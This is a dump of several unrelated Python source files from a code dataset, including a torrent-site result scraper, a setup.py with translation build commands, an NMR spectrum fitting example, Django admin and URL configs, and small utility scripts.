try to refresh\n\n self.guidePrep = keyVarFact(\n keyword = \"GuidePrep\",\n nval = 0,\n description = \"Guiding is preparing to start\",\n allowRefresh = False,\n )\n\n self.guideStart = keyVarFact(\n keyword = \"GuideStart\",\n nval = 0,\n description = \"Guiding begins\",\n allowRefresh = False,\n )\n\n keyVarFact.setKeysRefreshCmd()\n pvtVarFact.setKeysRefreshCmd()\n\n def _updRotExists(self, ipConfig, isCurrent, **kargs):\n \"\"\"Call when the TCC outputs ipConfig and use to set self.rotExists\n \"\"\"\n if not ipConfig:\n return\n hasRotChar = ipConfig[0]\n rotExists = (hasRotChar.lower() == \"t\")\n if (rotExists, isCurrent) != self.rotExists.getInd(0):\n self.rotExists.set((rotExists,), isCurrent)\n #print \"TCCModel._updRotExists: rotExists=%s, isCurrent=%s\" % tuple(self.rotExists.getInd(0))\n\n def _updGProbeDict(self, valueList, isCurrent, **kargs):\n \"\"\"Call when the TCC outputs gProbeInfo and use to update self.gProbeDict\n \"\"\"\n if valueList[0] is None:\n return\n guideProbe = GuideProbe(valueList)\n if guideProbe.number == 1:\n self.gProbeDict = OrderedDict()\n self.gProbeDict[guideProbe.number] = guideProbe\n\nclass GuideProbe(object):\n \"\"\"Information about one guide probe\n \"\"\"\n def __init__(self, valueList):\n self.number = valueList[0]\n self.exists = valueList[1]\n self.ctrXY = (valueList[2], valueList[3])\n self.minXY = (valueList[4], valueList[5])\n self.maxXY = (valueList[6], valueList[7])\n self.gp_rot_xy = (valueList[8], valueList[9])\n self.rot_gim_ang = valueList[10]\n\nif __name__ == \"__main__\":\n # confirm compilation\n model = getModel()\n","sub_path":"TUI/TCC/TCCModel.py","file_name":"TCCModel.py","file_ext":"py","file_size_in_byte":27808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"248895879","text":"from config.exceptions.NoHTMLException import NoHTMLException\nfrom config.exceptions.NoResultsFound import NoResultsFound\nfrom config.exceptions.ParseHTMLException import ParseHTMLException\nfrom TorrentProviders.GeneralTorrentProvider import GeneralTorrentProvider\nfrom TorrentProviders.Torrent import _Torrent\nfrom config import Common\n\nclass ThePirateBay(GeneralTorrentProvider):\n def __init__(self):\n super().__init__(\"The Pirate Bay\")\n\n def _get_html(self):\n try:\n search = \"/search/%s/\" % (self.title)\n self.soup = Common.getUrlSoup(self.proxy + search)\n print(\"fetching\")\n print(\"fetched\")\n except Exception as e:\n print(e)\n raise NoHTMLException(e)\n\n def _parse_html(self):\n try:\n content = self.soup.find('table', id=\"searchResult\")\n \n if content is None:\n message = \"No results found for given input!\"\n print(message)\n raise NoResultsFound(message)\n \n self.showTorrentList = list()\n \n data = content.find_all('tr')\n for i in data[1:]:\n \n torrent = _Torrent()\n \n torrent.name = i.find('a', class_='detLink').string\n torrent.uploader = i.find('font', class_=\"detDesc\").a\n if torrent.name is None:\n torrent.name = i.find('a', class_='detLink')['title'].split(\" \")[2:]\n torrent.name = \" \".join(str(x) for x in torrent.name)\n if torrent.uploader is None:\n torrent.uploader = i.find('font', class_=\"detDesc\").i.string\n else:\n torrent.uploader = torrent.uploader.string\n if self.OS_WIN:\n torrent.name = torrent.name.encode('ascii', 'replace').decode()\n comments = i.find(\n 'img', {'src': '//%s/static/img/icon_comment.gif' % (self.proxy.split('/')[2])})\n if comments is None:\n torrent.comment = '0'\n else:\n torrent.comment = 
comments['alt'].split(\" \")[-2]\n is_vip = i.find('img', {'title': \"VIP\"})\n is_trusted = i.find('img', {'title': 'Trusted'})\n if(is_vip is not None):\n torrent.isVIP = True\n elif(is_trusted is not None):\n torrent.isTrusted = True\n torrent.category = i.find('td', class_=\"vertTh\").find_all('a')[0].string\n torrent.subCategory = i.find('td', class_=\"vertTh\").find_all('a')[1].string\n torrent.seeds = int(i.find_all('td', align=\"right\")[0].string.strip())\n torrent.leeches = int(i.find_all('td', align=\"right\")[1].string.strip())\n torrent.date = i.find('font', class_=\"detDesc\").get_text().split(' ')[1].replace(',', \"\")\n torrent.size = Common.getSize(i.find('font', class_=\"detDesc\").get_text().split(' ')[3].replace(',', \"\"))\n torrent.torrentID = i.find('a', {'class': 'detLink'})[\"href\"].split('/')[2]\n torrent.link = \"%s/torrent/%s\" % (self.proxy, torrent.torrentID)\n torrent.magnet = (i.find_all('a', {'title': 'Download this torrent using magnet'})[0]['href']).replace(\"&\", \"&\")\n \n self._addTorrent(torrent)\n \n print(\"Results fetched successfully!\")\n except Exception as e:\n print(e)\n raise ParseHTMLException(e)\n\n \n def getEpisodes(self, episodesList):\n torrentsList = []\n for episode in episodesList:\n searchString = episode.show.title + \" S\" + format(episode.season, '02') + \"E\" + format(episode.episode, '02')\n selectedTorrent = self.getTorrents(searchString).selectedTorrent\n if (selectedTorrent is not None):\n selectedTorrent.traktId=episode.show.traktid\n torrentsList.append(selectedTorrent)\n return torrentsList\n","sub_path":"TorrentProviders/ThePirateBay.py","file_name":"ThePirateBay.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"21651725","text":"import click\nimport sys\nimport pandas as pd\n\n# Fix Python 2.x.\ntry:\n UNICODE_EXISTS = bool(type(unicode))\nexcept NameError:\n unicode = lambda s: str(s)\n\n\ndef printDebug(text, mystyle=\"\", **kwargs):\n \"\"\"\n util for printing in colors using click.secho()\n\n :kwargs = you can do printDebug(\"s\", bold=True)\n\n 2018-12-06: by default print to standard error (err=True)\n\n Styling output:\n \n Styles a text with ANSI styles and returns the new string. By default the styling is self contained which means that at the end of the string a reset code is issued. This can be prevented by passing reset=False.\n\n Examples:\n\n click.echo(click.style('Hello World!', fg='green'))\n click.echo(click.style('ATTENTION!', blink=True))\n click.echo(click.style('Some things', reverse=True, fg='cyan'))\n Supported color names:\n\n black (might be a gray)\n red\n green\n yellow (might be an orange)\n blue\n magenta\n cyan\n white (might be light gray)\n reset (reset the color code only)\n New in version 2.0.\n\n Parameters:\n text – the string to style with ansi codes.\n fg – if provided this will become the foreground color.\n bg – if provided this will become the background color.\n bold – if provided this will enable or disable bold mode.\n dim – if provided this will enable or disable dim mode. This is badly supported.\n underline – if provided this will enable or disable underline.\n blink – if provided this will enable or disable blinking.\n reverse – if provided this will enable or disable inverse rendering (foreground becomes background and the other way round).\n reset – by default a reset-all code is added at the end of the string which means that styles do not carry over. 
This can be disabled to compose styles.\n\n \"\"\"\n\n if mystyle == \"comment\":\n click.secho(text, dim=True, err=True)\n elif mystyle == \"important\":\n click.secho(text, bold=True, err=True)\n elif mystyle == \"normal\":\n click.secho(text, reset=True, err=True)\n elif mystyle == \"red\" or mystyle == \"error\":\n click.secho(text, fg='red', err=True)\n elif mystyle == \"green\":\n click.secho(text, fg='green', err=True)\n else:\n click.secho(text, **kwargs)\n\n\n\n\ndef slugify(value):\n \"\"\"\n Normalizes string, converts to lowercase, removes non-alpha characters,\n and converts spaces to hyphens.\n http://stackoverflow.com/questions/295135/turn-a-string-into-a-valid-filename-in-python\n \"\"\"\n import unicodedata, re\n value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')\n value = unicode(re.sub('[^\\w\\s-]', '', value.decode()).strip().lower())\n value = re.sub('[-\\s]+', '-', value)\n return value\n\n\n\ndef safe_str(u, errors=\"replace\"):\n \"\"\"Safely print the given string.\n\n If you want to see the code points for unprintable characters then you\n can use `errors=\"xmlcharrefreplace\"`.\n http://code.activestate.com/recipes/576602-safe-print/\n \"\"\"\n s = u.encode(sys.stdout.encoding or \"utf-8\", errors)\n return s\n\n\n\n\ndef print_stats_score(concepts_unique):\n \"\"\"From a concepts_unique dataframe, print out useful stats.\n\n Parameters\n ----------\n concepts_unique : pandas.DataFrame\n concepts_unique dataframe\n \"\"\" \n\n c = concepts_unique\n click.secho(f\"\"\"Total number of concepts: \n {len(c)}\"\"\")\n\n # score bins\n filter_values = [0, 0.5, 0.6, 0.8, 0.9, 1] \n out = pd.cut(c.score_avg, bins=filter_values)\n counts = pd.value_counts(out).sort_index().to_list()\n\n click.secho(f\"\"\"Score distribution (min={c.score_avg.min()} max={c.score_avg.max()} mean={\"%.2f\" % c.score_avg.mean()}):\"\"\")\n for n,v in enumerate(filter_values):\n if n < len(counts): # because filter values are taken two at a time\n click.secho(f\"\"\"\\t{filter_values[n]}-{filter_values[n+1]}: {counts[n]}\"\"\")\n\n\n\ndef print_stats_freq(concepts_unique):\n \"\"\"From a concepts_unique dataframe, print out useful stats.\n\n Parameters\n ----------\n concepts_unique : pandas.DataFrame\n concepts_unique dataframe\n \"\"\" \n\n c = concepts_unique\n click.secho(f\"\"\"Total number of concepts: \n {len(c)}\"\"\")\n\n # freq bins\n filter_values = [0, 1, 2, 3, 4, 5, c.frequency.max()] \n out = pd.cut(c.frequency, bins=filter_values)\n counts = pd.value_counts(out).sort_index().to_list()\n\n click.secho(f\"\"\"Frequency distribution (min={c.frequency.min()} max={c.frequency.max()}): \n 1: {counts[0]} concepts\n 2: {counts[1]}\n 3: {counts[2]}\n 4: {counts[3]}\n 5: {counts[4]}\n 6-{c.frequency.max()}: {counts[5]}\"\"\")\n\n\n\n\ndef print_parameters(min_score, min_freq, min_edge_weight):\n \"\"\"Prints out parameters used for the dataviz\"\"\"\n\n # average no of concepts per document\n click.secho(f\"\"\"**Filter parameters \"\"\")\n click.secho(f\"\"\"min_score: {min_score}\"\"\")\n click.secho(f\"\"\"min_freq: {min_freq}\"\"\")\n click.secho(f\"\"\"min_edge_weight: {min_edge_weight}\"\"\")\n\n\n\n\ndef dsl_extract_search_terms(dslquery):\n \"\"\"Return the inner keyword search parameter from a DSL query. 
\n IE just the stuff in quotes.\n\n Returns the query terms WITHOUT the outer quotes eg \n\n \\\"cell division\\\" AND spiders\n\n Parameters\n ----------\n dslquery : string\n Full DSL query eg \n 'search publications for \"napoleon\" return publications[id+concepts_scores] limit 500'\n \"\"\"\n #TODO improve\n l = dslquery.split()\n try:\n if \"where\" in l:\n candidates = l[l.index(\"for\")+1:l.index(\"where\")]\n else:\n candidates = l[l.index(\"for\")+1:l.index(\"return\")]\n except:\n printDebug(\"Error extracting search terms from DSL query\")\n return \"\"\n data = \" \".join(candidates)\n return data[1:len(data)-1] # remove outer quotes\n\n\n\n\n# import json\n# \"{json.dumps(keywords)}\" \n\ndef dsl_generate_query_from_search_keywords(keywords):\n \"\"\"Auto generate a valid DSL query\"\"\"\n # print(keywords)\n newk = keywords.replace('\"', '\\\\\"')\n # print(newk)\n q = f\"\"\"search publications \n for \"{newk}\" \n where concepts is not empty\n return publications[id+concepts_scores] \n sort by times_cited limit 1000\"\"\"\n return q \n","sub_path":"dice/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"489672642","text":"#!/usr/bin/python\n\nimport csv\nimport json\nimport api_twitter\n\nimport config\ntoken = config.load_token('/vagrant/config/twitter.json')\n\npath = '/vagrant/tmp/sample_user1.tsv'\n\nwith open(path, newline='', encoding='utf-8') as file:\n csv_reader = csv.reader(file, delimiter='\\t')\n tweets = []\n i = 0\n for row in csv_reader:\n i += 1\n print(i)\n tweet = api_twitter.tweet(token, row[0])\n if tweet is None:\n continue\n tweet['X_sentiment'] = row[6]\n tweets.append(tweet)\n\nwith open('/vagrant/tmp/sample_user2.json', 'w') as file:\n json.dump(tweets, file, sort_keys=True)\n\n","sub_path":"src/jp_tweets/tsv2json.py","file_name":"tsv2json.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"822297","text":"from django.conf.urls import patterns, include, url\nfrom django.views.generic.simple import direct_to_template\n\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n# admin.autodiscover()\n\nurlpatterns = patterns('',\n # Main:\n (r'^$', direct_to_template, {'template': 'index.html'}),\n (r'^index.html$', direct_to_template, {'template': 'index.html'}),\n\n # API:\n url(r'^api/1/', include('api.urls')),\n)\n","sub_path":"emberplay/emberplay/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"233978783","text":"#!/usr/bin/python3\n#Created by Harrison Barnett 11 Aug 17\n#Created for Comp1531 Lab2 Exercise\ns=int(input(\"How many numbers in series?: \"))\n\ncount = 0\nfib1 = 1\nfib2 = 
0\ntemp = 0\nwhile (count < s):\n\tif count <= 0:\n\t\tprint(\"1\")\n\t\tcount = count+1\n\telse:\n\t\tprint(fib1+fib2)\n\t\ttemp = fib2\n\t\tfib2 = fib1\n\t\tfib1 = fib1+temp\n\t\tcount = count+1\n\n","sub_path":"lab2/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"127073132","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n##\n# Project: GNOME App Folders Manager\n# Description: Manage GNOME Shell applications folders\n# Author: Fabio Castelli (Muflone) \n# Copyright: 2016-2017 Fabio Castelli\n# License: GPL-2+\n# This program is free software; you can redistribute it and/or modify it\n# under the terms of the GNU General Public License as published by the Free\n# Software Foundation; either version 2 of the License, or (at your option)\n# any later version.\n#\n# This program is distributed in the hope that it will be useful, but WITHOUT\n# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for\n# more details.\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA\n##\n\nfrom distutils.core import setup, Command\nfrom distutils.command.install_scripts import install_scripts\nfrom distutils.command.install_data import install_data\nfrom distutils.log import info\n\nimport os\nimport os.path\nimport shutil\nimport subprocess\nfrom itertools import chain\nfrom glob import glob\n\nfrom gnome_appfolders_manager.functions import recursive_glob\nfrom gnome_appfolders_manager.constants import (\n APP_NAME, APP_VERSION, APP_DESCRIPTION,\n APP_AUTHOR, APP_AUTHOR_EMAIL, APP_URL,\n DOMAIN_NAME)\n\n\nclass Install_Scripts(install_scripts):\n def run(self):\n install_scripts.run(self)\n self.rename_python_scripts()\n\n def rename_python_scripts(self):\n \"Rename main executable python script without .py extension\"\n for script in self.get_outputs():\n if script.endswith(\".py\"):\n info('renaming the python script %s -> %s' % (\n script, script[:-3]))\n shutil.move(script, script[:-3])\n\n\nclass Install_Data(install_data):\n def run(self):\n self.install_icons()\n self.install_translations()\n install_data.run(self)\n\n def install_icons(self):\n info('Installing icons...')\n DIR_ICONS = 'icons'\n for icon_format in os.listdir(DIR_ICONS):\n icon_dir = os.path.join(DIR_ICONS, icon_format)\n self.data_files.append((\n os.path.join('share', 'icons', 'hicolor', icon_format, 'apps'),\n glob(os.path.join(icon_dir, '*'))))\n\n def install_translations(self):\n info('Installing translations...')\n for po in glob(os.path.join('po', '*.po')):\n lang = os.path.basename(po[:-3])\n mo = os.path.join('build', 'mo', lang, '%s.mo' % DOMAIN_NAME)\n\n directory = os.path.dirname(mo)\n if not os.path.exists(directory):\n info('creating %s' % directory)\n os.makedirs(directory)\n\n cmd = 'msgfmt -o %s %s' % (mo, po)\n info('compiling %s -> %s' % (po, mo))\n if os.system(cmd) != 0:\n raise SystemExit('Error while running msgfmt')\n\n dest = os.path.join('share', 'locale', lang, 'LC_MESSAGES')\n self.data_files.append((dest, [mo]))\n\n\nclass Command_CreatePOT(Command):\n description = \"create base POT file\"\n user_options = [\n ('use-intltool-extract', None, 'Use intltool-extract'),\n ('keep-headers', None, 'Do not delete header 
files'),\n    ]\n    boolean_options = ('use-intltool-extract',)\n\n    def initialize_options(self):\n        self.use_intltool_extract = False\n        self.keep_headers = False\n\n    def finalize_options(self):\n        self.dir_base = os.path.dirname(os.path.abspath(__file__))\n        self.dir_po = os.path.join(self.dir_base, 'po')\n\n    def run(self):\n        self.dir_ui = os.path.join(self.dir_base, 'ui')\n        file_pot = '%s.pot' % os.path.join(self.dir_po, DOMAIN_NAME)\n        list_files_process = []\n        list_files_remove = []\n        if self.use_intltool_extract:\n            # Scan *.ui files to extract messages\n            for filename in glob(os.path.join(self.dir_ui, '*.ui')):\n                header_file = '%s.h' % filename\n                # Clear previous existing files\n                if os.path.isfile(header_file):\n                    os.unlink(header_file)\n                # Extract data from the interface files\n                subprocess.call(args=('intltool-extract',\n                                      '--quiet',\n                                      '--type=gettext/glade',\n                                      os.path.basename(filename)),\n                                cwd=os.path.dirname(filename))\n                if os.path.getsize(header_file) > 0:\n                    # Add the header files to the list of the files to process\n                    list_files_process.append(os.path.relpath(header_file,\n                                                              self.dir_base))\n                    # All the header files must be removed after the process\n                    list_files_remove.append(header_file)\n        else:\n            # Add *.ui files to list of files to process\n            for filename in glob(os.path.join(self.dir_ui, '*.ui')):\n                list_files_process.append(os.path.relpath(filename,\n                                                          self.dir_base))\n        # Add *.py files to list of files to process\n        for filename in recursive_glob(self.dir_base, '*.py'):\n            list_files_process.append(os.path.relpath(filename,\n                                                      self.dir_base))\n        # Sort the files to process them always in the same order (hopefully)\n        list_files_process.sort()\n        # Extract messages from the files to process\n        subprocess.call(\n            args=chain(('xgettext',\n                        '--keyword=_',\n                        '--keyword=N_',\n                        '--output=%s' % file_pot,\n                        '--add-location',\n                        '--package-name=%s' % APP_NAME,\n                        '--package-version=%s' % APP_VERSION,\n                        '--copyright-holder=%s' % APP_AUTHOR,\n                        '--msgid-bugs-address=%s' % APP_AUTHOR_EMAIL),\n                       list_files_process),\n            cwd=self.dir_base)\n        # Remove unneeded files if requested\n        if not self.keep_headers:\n            for filename in list_files_remove:\n                if os.path.isfile(filename):\n                    os.unlink(filename)\n\n\nclass Command_CreatePO(Command):\n    description = \"create translation PO file\"\n    user_options = [\n        ('locale=', None, 'Define locale'),\n        ('output=', None, 'Define output file'),\n    ]\n\n    def initialize_options(self):\n        self.locale = None\n        self.output = None\n\n    def finalize_options(self):\n        self.dir_base = os.path.dirname(os.path.abspath(__file__))\n        self.dir_po = os.path.join(self.dir_base, 'po')\n        assert (self.locale), 'Missing locale'\n        assert (self.output), 'Missing output file'\n\n    def run(self):\n        self.dir_ui = os.path.join(self.dir_base, 'ui')\n        file_pot = '%s.pot' % os.path.join(self.dir_po, DOMAIN_NAME)\n        file_po = '%s.po' % os.path.join(self.dir_po, self.output)\n        # Create PO file\n        subprocess.call(\n            args=('msginit',\n                  '--input=%s' % file_pot,\n                  '--no-translator',\n                  '--output-file=%s' % file_po,\n                  '--locale=%s' % self.locale),\n            cwd=self.dir_base)\n\n\nclass Command_Translations(Command):\n    description = \"build translations\"\n    user_options = []\n\n    def initialize_options(self):\n        pass\n\n    def finalize_options(self):\n        self.dir_base = os.path.dirname(os.path.abspath(__file__))\n        self.dir_po = os.path.join(self.dir_base, 'po')\n        self.dir_mo = os.path.join(self.dir_base, 'locale')\n\n    def run(self):\n        file_pot = '%s.pot' % os.path.join(self.dir_po, DOMAIN_NAME)\n        for file_po in glob(os.path.join(self.dir_po, 
'*.po')):\n subprocess.call(('msgmerge', '--update', '--backup=off',\n file_po, file_pot))\n lang = os.path.basename(file_po[:-3])\n file_mo = os.path.join(self.dir_mo, lang, 'LC_MESSAGES',\n '%s.mo' % DOMAIN_NAME)\n dir_lang = os.path.dirname(file_mo)\n if not os.path.exists(dir_lang):\n os.makedirs(dir_lang)\n subprocess.call(('msgfmt', '--output-file', file_mo, file_po))\n\n\nsetup(\n name=APP_NAME,\n version=APP_VERSION,\n author=APP_AUTHOR,\n author_email=APP_AUTHOR_EMAIL,\n maintainer=APP_AUTHOR,\n maintainer_email=APP_AUTHOR_EMAIL,\n url=APP_URL,\n description=APP_DESCRIPTION,\n license='GPL v2',\n scripts=['gnome-appfolders-manager.py'],\n packages=['gnome_appfolders_manager', 'gnome_appfolders_manager.models',\n 'gnome_appfolders_manager.ui'],\n data_files=[\n ('share/gnome-appfolders-manager/data',\n ['data/gnome-appfolders-manager.png']),\n ('share/applications',\n ['data/gnome-appfolders-manager.desktop']),\n ('share/doc/gnome-appfolders-manager',\n list(chain(glob('doc/*'), glob('*.md')))),\n ('share/gnome-appfolders-manager/ui',\n glob('ui/*')),\n ],\n cmdclass={\n 'install_scripts': Install_Scripts,\n 'install_data': Install_Data,\n 'create_pot': Command_CreatePOT,\n 'create_po': Command_CreatePO,\n 'translations': Command_Translations\n }\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":9680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"485046744","text":"#!/usr/bin/env python\n\"\"\"\n²H MAS NMR of Methionine\n^^^^^^^^^^^^^^^^^^^^^^^^\n\"\"\"\n# %%\n# The following is a least-squares fitting example of a :math:`^{2}\\text{H}` MAS NMR\n# spectrum of Methionine. The experimental dataset is a part of DMFIT [#f1]_ examples.\n# We thank Dr. Dominique Massiot for sharing the dataset.\nimport csdmpy as cp\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom lmfit import Minimizer\n\nfrom mrsimulator import Simulator, SpinSystem, Site\nfrom mrsimulator.method.lib import BlochDecaySpectrum\nfrom mrsimulator import signal_processor as sp\nfrom mrsimulator.utils import spectral_fitting as sf\nfrom mrsimulator.utils import get_spectral_dimensions\nfrom mrsimulator.spin_system.tensors import SymmetricTensor\n\n# sphinx_gallery_thumbnail_number = 4\n\n# %%\n# Import the dataset\n# ------------------\nhost = \"https://nmr.cemhti.cnrs-orleans.fr/Dmfit/Help/csdm/\"\nfilename = \"2H methiodine MAS.csdf\"\nexperiment = cp.load(host + filename)\n\n# For spectral fitting, we only focus on the real part of the complex dataset\nexperiment = experiment.real\n\n# Convert the coordinates along each dimension from Hz to ppm.\n_ = [item.to(\"ppm\", \"nmr_frequency_ratio\") for item in experiment.dimensions]\n\n# plot of the dataset.\nplt.figure(figsize=(4.25, 3.0))\nax = plt.subplot(projection=\"csdm\")\nax.plot(experiment, color=\"black\", linewidth=0.5, label=\"Experiment\")\nax.set_xlim(600, -700)\nplt.grid()\nplt.tight_layout()\nplt.show()\n\n# %%\n# Estimate noise statistics from the dataset\ncoords = experiment.dimensions[0].coordinates\nnoise_region = np.where(np.logical_and(coords > -250e-6, coords < -210e-6))\nnoise_data = experiment[noise_region]\n\nplt.figure(figsize=(3.75, 2.5))\nax = plt.subplot(projection=\"csdm\")\nax.plot(noise_data, label=\"noise\")\nplt.title(\"Noise section\")\nplt.axis(\"off\")\nplt.tight_layout()\nplt.show()\n\nnoise_mean, sigma = experiment[noise_region].mean(), experiment[noise_region].std()\nnoise_mean, sigma\n\n# %%\n# Create a fitting model\n# 
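# (In rough outline: the single 2H site defined below exposes Cq, eta and the\n# isotropic shift; the shift is frozen before the fit with vary=False, so the\n# least-squares step is left to adjust mainly Cq/eta, the exponential line\n# broadening and the overall scale factor.)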
----------------------\n# **Spin System**\nH_2 = Site(\n isotope=\"2H\",\n isotropic_chemical_shift=-57.12, # in ppm,\n quadrupolar=SymmetricTensor(Cq=3e4, eta=0.0), # Cq in Hz\n)\n\nspin_systems = [SpinSystem(sites=[H_2])]\n\n# %%\n# **Method**\n\n# Get the spectral dimension parameters from the experiment.\nspectral_dims = get_spectral_dimensions(experiment)\n\nMAS = BlochDecaySpectrum(\n channels=[\"2H\"],\n magnetic_flux_density=9.395, # in T\n rotor_frequency=4517.1, # in Hz\n spectral_dimensions=spectral_dims,\n experiment=experiment, # experimental dataset\n)\n\n\n# %%\n# **Guess Model Spectrum**\n\n# Simulation\n# ----------\nsim = Simulator(spin_systems=spin_systems, methods=[MAS])\nsim.run()\n\n# Post Simulation Processing\n# --------------------------\nprocessor = sp.SignalProcessor(\n operations=[\n sp.IFFT(),\n sp.apodization.Exponential(FWHM=\"60 Hz\"),\n sp.FFT(),\n sp.Scale(factor=140),\n ]\n)\nprocessed_dataset = processor.apply_operations(dataset=sim.methods[0].simulation).real\n\n# Plot of the guess Spectrum\n# --------------------------\nplt.figure(figsize=(4.25, 3.0))\nax = plt.subplot(projection=\"csdm\")\nax.plot(experiment, color=\"black\", linewidth=0.5, label=\"Experiment\")\nax.plot(processed_dataset, linewidth=2, alpha=0.6, label=\"Guess Spectrum\")\nax.set_xlim(600, -700)\nplt.grid()\nplt.legend()\nplt.tight_layout()\nplt.show()\n\n\n# %%\n# Least-squares minimization with LMFIT\n# -------------------------------------\n# Use the :func:`~mrsimulator.utils.spectral_fitting.make_LMFIT_params` for a quick\n# setup of the fitting parameters.\nparams = sf.make_LMFIT_params(sim, processor)\nparams[\"sys_0_site_0_isotropic_chemical_shift\"].vary = False\nprint(params.pretty_print(columns=[\"value\", \"min\", \"max\", \"vary\", \"expr\"]))\n\n# %%\n# **Solve the minimizer using LMFIT**\nopt = sim.optimize() # Pre-compute transition pathways\nminner = Minimizer(\n sf.LMFIT_min_function,\n params,\n fcn_args=(sim, processor, sigma),\n fcn_kws={\"opt\": opt},\n)\nresult = minner.minimize()\nresult\n\n# %%\n# The best fit solution\n# ---------------------\nbest_fit = sf.bestfit(sim, processor)[0].real\nresiduals = sf.residuals(sim, processor)[0].real\n\n# Plot the spectrum\nplt.figure(figsize=(4.25, 3.0))\nax = plt.subplot(projection=\"csdm\")\nax.plot(experiment, color=\"black\", linewidth=0.5, label=\"Experiment\")\nax.plot(residuals, color=\"gray\", linewidth=0.5, label=\"Residual\")\nax.plot(best_fit, linewidth=2, alpha=0.6, label=\"Best Fit\")\nax.set_xlim(600, -700)\nplt.grid()\nplt.legend()\nplt.tight_layout()\nplt.show()\n\n# %%\n#\n# .. [#f1] D.Massiot, F.Fayon, M.Capron, I.King, S.Le Calvé, B.Alonso, J.O.Durand,\n# B.Bujoli, Z.Gan, G.Hoatson, 'Modelling one and two-dimensional solid-state NMR\n# spectra.', Magn. Reson. Chem. 
**40** 70-76 (2002)\n# `DOI: 10.1002/mrc.984 `_\n","sub_path":"fitting_source/1D_fitting/plot_4_2H_quad.py","file_name":"plot_4_2H_quad.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"361525273","text":"# organizations/admin.py\nimport typing\nfrom django.contrib import admin\nfrom django.db import models\nfrom django.http.request import HttpRequest\nfrom rest_framework_api_key.admin import APIKeyModelAdmin\nfrom .models import DosUserAPIKey\n\nadmin.site.site_header = \"Capacity Status API Administration\"\n\n\n@admin.register(DosUserAPIKey)\nclass DosUserAPIKeyModelAdmin(APIKeyModelAdmin):\n\n # form = DosUserAPIKeyAdminForm\n is_change_view_call = False\n\n def get_exclude(self, request, obj=None):\n if self.exclude:\n self.exclude += [\"dos_user_id\", \"name\"]\n else:\n self.exclude = [\"dos_user_id\", \"name\"]\n\n return super().get_exclude(request, obj)\n\n def get_readonly_fields(\n self, request: HttpRequest, obj: models.Model = None\n ) -> typing.Tuple[str, ...]:\n fields = super().get_readonly_fields(request, obj)\n if self.is_change_view_call:\n fields += (\"dos_username\",)\n return fields\n\n def change_view(self, request, object_id, form_url=\"\", extra_context=None):\n self.is_change_view_call = True\n return_value = super().change_view(request, object_id, form_url, extra_context)\n self.is_change_view_call = False\n return return_value\n","sub_path":"application/api/capacityauth/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"503797589","text":"import re\nfrom enum import Enum\nfrom typing import Any, Callable, Dict, Iterator, Mapping, Optional, Pattern, Set, Type\n\nfrom fastapi.encoders import jsonable_encoder\nfrom pydantic import BaseConfig, BaseModel, ConstrainedStr, create_model\n\nfrom .helpers import is_async_iterable, is_awaitable, is_iterable, is_mappable\n\n\nclass SchemaConfig(BaseConfig):\n api_component_name: Optional[str] = None\n api_component_name_plural: Optional[str] = None\n default_readable_fields: 'SchemaFields' = set()\n read_only_fields: 'SchemaFields' = set()\n write_only_fields: 'SchemaFields' = set()\n\n\nclass Schema(BaseModel):\n __config__: Type[SchemaConfig]\n _cache: Dict[str, Any] = {}\n\n def __init_subclass__(cls, **kwargs: Any):\n super().__init_subclass__()\n cls._cache = {}\n\n class Config(SchemaConfig):\n ...\n\n @classmethod\n def optional(cls, class_name: str = None) -> 'SchemaClass':\n class_name = class_name or f'{cls.__name__}Optional'\n model = cls._cache.get(class_name)\n if model is None:\n fields = {\n field_name: (field.type_, None) for field_name, field in cls.__fields__.items()\n }\n model = create_model(\n class_name, __base__=cls, __module__=cls.__module__, **fields # type: ignore\n )\n # Prevent class from recreation on each call,\n # otherwise OpenAPI schema generation is broken\n cls._cache[class_name] = model\n return model # type: ignore\n\n @classmethod\n def get_config(cls) -> Type[SchemaConfig]:\n return cls.__config__\n\n @classmethod\n def get_read_only_fields(cls) -> 'SchemaFields':\n return cls.__config__.read_only_fields & set(cls.__fields__.keys())\n\n @classmethod\n def get_write_only_fields(cls) -> 'SchemaFields':\n return cls.__config__.write_only_fields & set(cls.__fields__.keys())\n\n @classmethod\n def get_readable_fields(cls) -> 'SchemaFields':\n return 
